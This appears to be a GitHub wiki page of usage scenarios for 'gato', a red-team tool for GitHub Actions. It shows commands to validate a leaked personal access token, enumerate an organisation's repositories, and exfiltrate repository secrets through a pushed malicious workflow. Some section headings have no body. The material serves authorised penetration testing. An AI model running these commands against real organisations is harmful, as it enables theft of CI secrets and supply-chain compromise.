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Adnan Khan edited this page Dec 26, 2023 · 2 revisions

Gato Usage Scenarios

This page is a living document of real-world examples where gato is useful. At a high level: I have X, how can I do Y?

Determining the Reach of a Compromised GitHub PAT

This is where gato is most useful as a tool. Suppose you are conducting a penetration test or red team and identify a personal access token hard-coded in a script.


The first step is to validate the token: gato e -v

Enumerate Target Organization

Suppose your target is EvilCorp, and you find that the user is a member of EvilCorp:

gato -s e -t evilcorp -oJ evilcorp_gato.json

The above command will list and enumerate all repositories within the evilcorp GitHub organization. It will determine the user's permissions to each repository and provide you with everything that that user can access and how to take advantage of it.

Exfiltrate Secrets

Suppose gato finds that the user can access secrets from EvilRepository, and because the token has the workflow scope, the user can steal them with a malicious workflow.

gato -s attack -t evilcorp/evilrepository --secrets --delete-action

Gato will create a new branch, push a workflow to it, wait for the workflow to execute, and then download the run log which will contain asymmetrically encrypted secrets using a just-in-time public key. This is to prevent broader compromise if someone looks at the run-log.

Gato will then decrypt the secrets and print them. Gato only supports exfiltrating secrets from one repository at a time. Nothing stops you from writing a wrapper script to exfiltrate secrets from an entire organization if you so choose.

Establish a foothold on a Self-hosted Runner


Establishing Baseline Impact of Compromised Developer Token


Scan a public GitHub Organization for Self-Hosted Runners

gato -s enumerate -t targetOrg -oJ target_org_gato.json